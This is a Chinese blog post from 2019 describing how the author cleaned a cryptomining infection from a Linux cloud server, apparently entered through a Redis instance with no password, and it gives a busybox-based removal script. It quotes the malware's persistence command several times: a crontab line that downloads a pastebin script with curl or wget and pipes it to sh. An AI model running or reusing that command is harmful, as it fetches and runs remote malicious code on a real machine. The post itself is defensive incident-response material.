最近3月杀死linux挖矿病毒

最近从2月17号开始一直收到阿里云的报警信息;

您的云服务器(120.78.158.127)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(TCP:3389)的访问,阻断预计将在2019-03-19 11:46:21时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后,感谢您对阿里云的支持。

 

 

crontab -l 查看定时任务发现有 */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh
明显是一段挖矿程序

redis也有一个Cache键里放着这个字段*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh

所以我认为是我redis没设密码导致的,具体他是怎么通过redis来倾入,这个不得而知,后续再探究。

sed -i 删除指定任务
太强了有个脚本程序一直在执行echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" >> /var/spool/cron/root

busybox top 才能得到未被劫持的so执行程序。

#先要关掉crond,防止在清除过程中又开始下载脚本
service crond stop

# 删除劫持的libcset.so预加载动态链接库,隐藏病毒

# 清理异常进程

# 再次清理异常进程

# 清理开机启动项

 杀毒代码合并ksoftirqds,kthrotlds,kpsmouseds,kintegrityds杀毒

service crond stop

busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so
chattr -i /etc/ld.so.preload
busybox rm -f /etc/ld.so.preload
busybox rm -f /usr/local/lib/libcset.so

# 清理异常进程
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

busybox rm -f /tmp/kthrotlds
busybox rm -f /tmp/kintegrityds
busybox rm -f /tmp/kpsmouseds
busybox rm -f /etc/cron.d/tomcat
busybox rm -f /etc/cron.d/root
busybox rm -f /var/spool/cron/root
busybox rm -f /var/spool/cron/crontabs/root
busybox rm -f /etc/rc.d/init.d/kthrotlds
busybox rm -f /etc/rc.d/init.d/kpsmouseds
busybox rm -f /etc/rc.d/init.d/kintegrityds
busybox rm -f /usr/sbin/kthrotlds
busybox rm -f /usr/sbin/kintegrityds
busybox rm -f /usr/sbin/kpsmouseds
busybox rm -f /etc/init.d/netdns


ldconfig

# 再次清理异常进程
busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' | busybox xargs kill -9
busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' | busybox xargs kill -9

# 清理开机启动项
chkconfig netdns off
chkconfig –del netdns

service crond start
echo "Done, Please reboot!"


# sidie@moresec

  具体杀毒解析流程见:https://www.anquanke.com/post/id/172111

 

posted on 2019-03-19 10:13  酒夜狸  阅读(3660)  评论(0编辑  收藏  举报

导航